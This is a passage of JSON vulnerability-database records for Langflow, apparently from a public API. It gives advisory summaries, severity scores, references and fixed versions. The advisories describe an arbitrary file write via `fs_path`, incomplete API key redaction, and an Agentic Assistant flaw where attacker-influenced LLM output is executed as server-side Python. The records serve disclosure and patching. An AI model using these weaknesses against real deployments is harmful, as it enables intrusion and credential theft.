            "summary": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68478",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10573",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68478"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-19T17:23:19Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68478",
                    "reference_id": "CVE-2025-68478",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68478"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f43r-cc68-gpx4",
                    "reference_id": "GHSA-f43r-cc68-gpx4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-f43r-cc68-gpx4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/46626?format=api",
                    "purl": "pkg:pypi/langflow@1.7.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48829?format=api",
                    "purl": "pkg:pypi/langflow@1.7.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1"
                }
            ],
            "aliases": [
                "CVE-2025-68478",
                "GHSA-f43r-cc68-gpx4",
                "PYSEC-2025-125"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sbea-kkfu-akgb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89463?format=api",
            "vulnerability_id": "VCID-u8mw-7znw-rfab",
            "summary": "Langflow has an Information Leak through Incomplete API Key Redaction\nA weakness has been identified in langflow-ai langflow up to 1.8.3. Impacted is the function remove_api_keys/has_api_terms of the file src/backend/base/langflow/api/utils/core.py of the component Flow Using API. This manipulation causes unprotected storage of credentials. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6597",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0156",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-6597"
                },
                {
                    "reference_url": "https://gist.github.com/chenhouser2025/b93261c6e651f14800a4f2e4365f357b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.3",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/"
                        }
                    ],
                    "url": "https://gist.github.com/chenhouser2025/b93261c6e651f14800a4f2e4365f357b"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6597",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6597"
                },
                {
                    "reference_url": "https://vuldb.com/submit/791920",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.3",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/"
                        }
                    ],
                    "url": "https://vuldb.com/submit/791920"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/358232",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.3",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/358232"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/358232/cti",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.3",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/358232/cti"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
                    "reference_id": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5jjf-wcvf-923w",
                    "reference_id": "GHSA-5jjf-wcvf-923w",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-5jjf-wcvf-923w"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48844?format=api",
                    "purl": "pkg:pypi/langflow@1.8.4",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.8.4"
                }
            ],
            "aliases": [
                "CVE-2026-6597",
                "GHSA-5jjf-wcvf-923w"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u8mw-7znw-rfab"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37257?format=api",
            "vulnerability_id": "VCID-v5pc-pdm9-97g8",
            "summary": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assistant feature in Langflow executes LLM-generated Python code during its validation phase. Although this phase appears intended to validate generated component code, the implementation reaches dynamic execution sinks and instantiates the generated class server-side. In deployments where an attacker can access the Agentic Assistant feature and influence the model output, this can result in arbitrary server-side Python execution. Version 1.9.0 fixes the issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33873",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20469",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33873"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/router.py#L252-L297",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/router.py#L252-L297"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/schemas.py#L20-L31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/schemas.py#L20-L31"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/code_extraction.py#L11-L53",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/code_extraction.py#L11-L53"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/validation.py#L27-L47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/helpers/validation.py#L27-L47"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L142-L156",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L142-L156"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L259-L300",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L259-L300"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L58-L79",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/services/assistant_service.py#L58-L79"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/utils/core.py#L38",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/utils/core.py#L38"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/v1/login.py#L96-L135",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/api/v1/login.py#L96-L135"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L156-L163",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/services/auth/utils.py#L156-L163"
                },
                {
